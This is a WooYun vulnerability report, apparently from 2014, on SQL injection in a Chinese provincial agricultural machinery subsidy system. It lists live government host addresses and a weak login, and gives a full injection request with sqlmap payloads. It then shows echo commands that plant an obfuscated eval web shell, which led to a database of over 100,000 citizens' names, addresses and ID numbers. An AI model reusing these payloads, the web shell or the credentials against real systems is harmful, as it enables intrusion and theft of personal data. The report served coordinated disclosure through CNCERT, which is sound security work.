当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070849

漏洞标题:某省农机购置补贴系统旁站SQL注射(泄漏该通用系统源码及信息泄露风险)

相关厂商:CNCERT

漏洞作者: 超威蓝猫

提交时间:2014-08-03 17:58

修复时间:2014-11-01 18:00

公开时间:2014-11-01 18:00

漏洞类型:源代码泄漏

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-03: 细节已通知厂商并且等待厂商处理中
2014-08-08: 厂商已经确认,细节仅向厂商公开
2014-08-11: 细节向第三方安全合作伙伴开放
2014-10-02: 细节向核心白帽子及相关领域专家公开
2014-10-12: 细节向普通白帽子公开
2014-10-22: 细节向实习白帽子公开
2014-11-01: 细节向公众公开

简要描述:

某省农机购置补贴系统旁站SQL注射(泄漏该通用系统源码及信息泄露风险)

详细说明:

目测这套"农机购置补贴管理软件系统"全国都在用,下面仅列举几例

http://111.75.206.248:8081/ 江西省
http://116.52.13.46:2014/ 云南省
http://113.140.74.6/ 陕西省
http://61.178.38.194:2014/ 甘肃省
http://220.171.42.161:801/ 新疆
http://60.190.2.79/ 浙江宁波
http://113.108.163.164:8080/ 广东省
http://59.61.92.123:2014/ 福建厦门
http://218.58.77.226:82/ 山东青岛
http://124.93.228.165:92/ 辽宁大连
http://58.49.103.227:2014/ 湖北省
http://61.138.188.217:81/ 吉林省
http://218.12.43.28/ 河北省


江西省的"111.75.206.248"上运行着这个站: http://amic.jxagri.gov.cn/
http://amic.jxagri.gov.cn/jxmulu2014/ 此处存在弱口令 123456:123456
登录后点击左侧的"归档产品信息"-"查看归档情况及意见反馈",搜索处存在SQL注射

sshot-2014-08-03-[1].png

sshot-2014-08-03-[2].png

sshot-2014-08-03-[3].png


POST /jxmulu2014/Company_Product_List.aspx HTTP/1.1
Host: amic.jxagri.gov.cn
Proxy-Connection: keep-alive
Content-Length: 913
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://amic.jxagri.gov.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)  Chrome/32.0.1700.107 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://amic.jxagri.gov.cn/jxmulu2014/Company_Product_List.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: _gscu_637803496=054844769hrepz30; ASP.NET_SessionId=xfcxhq45qrhokwumo2pjfkfd
__VIEWSTATE=%2BsxHERRYsN2t51DLo7FlVQOQI%2B35UDaSLsDH93uJnC% 2BmSnuXm1Y3jz71931foXgZbuzN7S8XpeIu%2BGaNPuboxDtXaDaf7GRhpQarcBmtTeUjjZr%2BpL% 2BesB33VNguIJfRqW1kZHuQArM9erjmMl9ikaXfv6fPzSS64OlL4FnH65gcZeuBgirePWg2EhB% 2BlZ2iiaacyiawwnSyeQHKIJSgTkG65G9Zk7faTRVuCLPOoJq89xNHSxrHbFbdV5O4oC4U2A9J1yn9Pf9pBtQZL FZ9ej3gCvjEhl5yVZ2RbRx7szC3sWp%2BqDBZwYBH7LmX3%2FUtS1cF% 2BxaiNmbqosjmql2zR3593F3IkLu0U3q7f2SC91BDTuJ92bVUdG0% 2BmUoEczRe9omvIi0lkDM3jTifvLNq2VNCDqMnfLiGrwdgtb1BRFS% 2B4TljbDvdc9blnDAmLr7r2OS8aDZt8IEo%2BaFzL4rE5bJkt4GuG%2F0xm%2B6% 2F34caxa8R0tLRJbpvWqlbAyRu65m5vKUJ9EphjICCLGkNRiDJ2866jLSMyPFVcpJ8RfwBZw8gb1CPuUOKywuo9 53hipVMOlmkIflybaUE7u1EOm6J7uvN5%2FI% 3D&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYu OKsqGhfq0Ob6yGLlagbp%2BJXiy1vlK0dWPdZrlSJatxBaZEx%2Fjc9Hi9RYHoI4Aajocoh% 2BKfHcfImjUjcjZau1HwQk4g%3D%3D&Searchtype=Model&seachvalue=1*&Searchuser=%E6%90%9C%E7% B4%A2&T_Message=


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=+sxHERRYsN2t51DLo7FlVQOQI+35UDaSLsDH93uJnC+mSnuXm1Y3jz71931foXgZbuzN7S8XpeIu+GaNPuboxDtXaDaf7GRhpQarcBmtTeUjjZr+pL+esB33VNguIJfRqW1kZHuQArM9erjmMl9ikaXfv6fPzSS64OlL4FnH65gcZeuBgirePWg2EhB+lZ2iiaacyiawwnSyeQHKIJSgTkG65G9Zk7faTRVuCLPOoJq89xNHSxrHbFbdV5O4oC4U2A9J1yn9Pf9pBtQZLFZ9ej3gCvjEhl5yVZ2RbRx7szC3sWp+qDBZwYBH7LmX3/UtS1cF+xaiNmbqosjmql2zR3593F3IkLu0U3q7f2SC91BDTuJ92bVUdG0+mUoEczRe9omvIi0lkDM3jTifvLNq2VNCDqMnfLiGrwdgtb1BRFS+4TljbDvdc9blnDAmLr7r2OS8aDZt8IEo+aFzL4rE5bJkt4GuG/0xm+6/34caxa8R0tLRJbpvWqlbAyRu65m5vKUJ9EphjICCLGkNRiDJ2866jLSMyPFVcpJ8RfwBZw8gb1CPuUOKywuo953hipVMOlmkIflybaUE7u1EOm6J7uvN5/I=&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp+JXiy1vlK0dWPdZrlSJatxBaZEx/jc9Hi9RYHoI4Aajocoh+KfHcfImjUjcjZau1HwQk4g==&Searchtype=Model&seachvalue=1%' AND 5829=CONVERT(INT,(SELECT CHAR(113)+CHAR(104)+CHAR(103)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5829=5829) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(106)+CHAR(99)+CHAR(113))) AND '%'='&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=+sxHERRYsN2t51DLo7FlVQOQI+35UDaSLsDH93uJnC+mSnuXm1Y3jz71931foXgZbuzN7S8XpeIu+GaNPuboxDtXaDaf7GRhpQarcBmtTeUjjZr+pL+esB33VNguIJfRqW1kZHuQArM9erjmMl9ikaXfv6fPzSS64OlL4FnH65gcZeuBgirePWg2EhB+lZ2iiaacyiawwnSyeQHKIJSgTkG65G9Zk7faTRVuCLPOoJq89xNHSxrHbFbdV5O4oC4U2A9J1yn9Pf9pBtQZLFZ9ej3gCvjEhl5yVZ2RbRx7szC3sWp+qDBZwYBH7LmX3/UtS1cF+xaiNmbqosjmql2zR3593F3IkLu0U3q7f2SC91BDTuJ92bVUdG0+mUoEczRe9omvIi0lkDM3jTifvLNq2VNCDqMnfLiGrwdgtb1BRFS+4TljbDvdc9blnDAmLr7r2OS8aDZt8IEo+aFzL4rE5bJkt4GuG/0xm+6/34caxa8R0tLRJbpvWqlbAyRu65m5vKUJ9EphjICCLGkNRiDJ2866jLSMyPFVcpJ8RfwBZw8gb1CPuUOKywuo953hipVMOlmkIflybaUE7u1EOm6J7uvN5/I=&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp+JXiy1vlK0dWPdZrlSJatxBaZEx/jc9Hi9RYHoI4Aajocoh+KfHcfImjUjcjZau1HwQk4g==&Searchtype=Model&seachvalue=1%'; WAITFOR DELAY '0:0:5'--&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=+sxHERRYsN2t51DLo7FlVQOQI+35UDaSLsDH93uJnC+mSnuXm1Y3jz71931foXgZbuzN7S8XpeIu+GaNPuboxDtXaDaf7GRhpQarcBmtTeUjjZr+pL+esB33VNguIJfRqW1kZHuQArM9erjmMl9ikaXfv6fPzSS64OlL4FnH65gcZeuBgirePWg2EhB+lZ2iiaacyiawwnSyeQHKIJSgTkG65G9Zk7faTRVuCLPOoJq89xNHSxrHbFbdV5O4oC4U2A9J1yn9Pf9pBtQZLFZ9ej3gCvjEhl5yVZ2RbRx7szC3sWp+qDBZwYBH7LmX3/UtS1cF+xaiNmbqosjmql2zR3593F3IkLu0U3q7f2SC91BDTuJ92bVUdG0+mUoEczRe9omvIi0lkDM3jTifvLNq2VNCDqMnfLiGrwdgtb1BRFS+4TljbDvdc9blnDAmLr7r2OS8aDZt8IEo+aFzL4rE5bJkt4GuG/0xm+6/34caxa8R0tLRJbpvWqlbAyRu65m5vKUJ9EphjICCLGkNRiDJ2866jLSMyPFVcpJ8RfwBZw8gb1CPuUOKywuo953hipVMOlmkIflybaUE7u1EOm6J7uvN5/I=&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=K1xrMTDOkDPElC6msyO31mUJxf4FJqMUSrZGFalsGrYuOKsqGhfq0Ob6yGLlagbp+JXiy1vlK0dWPdZrlSJatxBaZEx/jc9Hi9RYHoI4Aajocoh+KfHcfImjUjcjZau1HwQk4g==&Searchtype=Model&seachvalue=1%' WAITFOR DELAY '0:0:5'--&Searchuser=%E6%90%9C%E7%B4%A2&T_Message=
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005


sshot-2014-08-03-[4].png


一番搜寻,找到 http://111.75.206.248:8081/ 对应目录为 "D:\GouZBT2014\nybgjbt2014\" ,
http://amic.jxagri.gov.cn/jxagri_web/ 对应目录为 "D:\njj2011\jxagri_web\"
各种姿势写一句话都无法访问,最后发现可以在--os-shell下用echo写入:

echo ^<%@ Page Language = Jscript %^> >> "D:\njj2011\jxagri_web\1.txt"
echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/ >> "D:\njj2011\jxagri_web\1.txt"
echo "a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+  >> "D:\njj2011\jxagri_web\1.txt"
echo "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+ >> "D:\njj2011\jxagri_web\1.txt"
echo ","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval >> "D:\njj2011\jxagri_web\1.txt"
echo (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%^> >> "D:\njj2011\jxagri_web\1.txt"
rename "D:\njj2011\jxagri_web\1.txt" "index.bak.aspx"


sshot-2014-08-03-[5].png


菜刀成功连接:

sshot-2014-08-03-[6].png


漏洞证明:

连接数据库:

sshot-2014-08-03-[7].png


sshot-2014-08-03-[8].png


十多万人的姓名住址身份证号

sshot-2014-08-03-[9].png


同时,还可以通过菜刀下载这套全国通用系统的源码,通过代码审计有可能挖掘出通用漏洞,进而影响全国各地使用该系统的网站 ._.||

修复方案:

你们更专业:)

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-08-08 15:32

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-03 19:52 | Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)

    @超威蓝猫 蓝猫再现V5